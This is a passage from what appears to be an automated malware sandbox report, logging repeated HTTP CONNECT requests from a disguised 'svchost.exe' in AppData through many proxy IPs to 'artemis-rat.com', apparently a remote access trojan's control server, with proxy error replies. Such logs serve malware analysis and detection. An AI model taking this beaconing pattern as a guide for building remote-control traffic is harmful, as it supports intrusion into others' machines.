                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3642192.168.2.560977203.222.24.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.660252094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.146055937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.646651983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3643192.168.2.56027751.77.222.4811843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.672772884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.583930016 CET131INHTTP/1.1 503 Too many open connections
                                                                                    Content-Type: text/plain
                                                                                    Connection: close
                                                                                    Data Raw: 4d 61 78 69 6d 75 6d 20 6e 75 6d 62 65 72 20 6f 66 20 6f 70 65 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 73 20 72 65 61 63 68 65 64 2e 0a
                                                                                    Data Ascii: Maximum number of open connections reached.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3644192.168.2.56153994.131.63.1205837856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.680196047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3645192.168.2.561506185.101.16.528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.684370995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3646192.168.2.55805562.152.53.186890943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.689800978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3647192.168.2.558322181.129.62.24737743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.694247007 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3648192.168.2.561581172.67.181.208056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.699748039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.857387066 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3649192.168.2.561587185.162.228.1548056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.708992004 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.865976095 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3650192.168.2.561594104.25.64.278056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.721111059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.875179052 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3651192.168.2.561610104.22.50.2208056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.745198965 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.899760962 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3652192.168.2.561524201.13.147.161567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.763849974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3653192.168.2.561519103.118.46.177808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.764127970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3654192.168.2.558383185.49.31.207808143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.773324013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3655192.168.2.55819751.38.63.1242729443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.787482977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3656192.168.2.561525119.3.215.41888856176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.792732000 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3657192.168.2.561576107.180.88.1733577456176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.792732954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.378304958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3658192.168.2.558181190.211.161.2103241043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.794528008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3659192.168.2.561591184.170.248.5414556176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.802844048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3660192.168.2.561609103.35.189.217108056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.803114891 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.378201008 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3661192.168.2.560183213.184.153.66808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.819895983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3662192.168.2.558449184.105.182.254312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.821794987 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3663192.168.2.56155861.129.2.212808056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.829351902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.172162056 CET726INHTTP/1.1 502 Bad Gateway
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Sat, 09 Mar 2024 12:11:40 GMT
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Content-Length: 559
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.20.1</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3664192.168.2.55841412.186.205.1208043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.844712019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.036645889 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3665192.168.2.561647154.208.10.1268056176C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.845103979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.007239103 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.23.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:37 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3666192.168.2.561510222.138.76.6900243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.851227999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.370368004 CET311INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx
                                                                                    Date: Sat, 09 Mar 2024 12:14:38 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3667192.168.2.558409162.214.163.1375050943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:37.865628958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
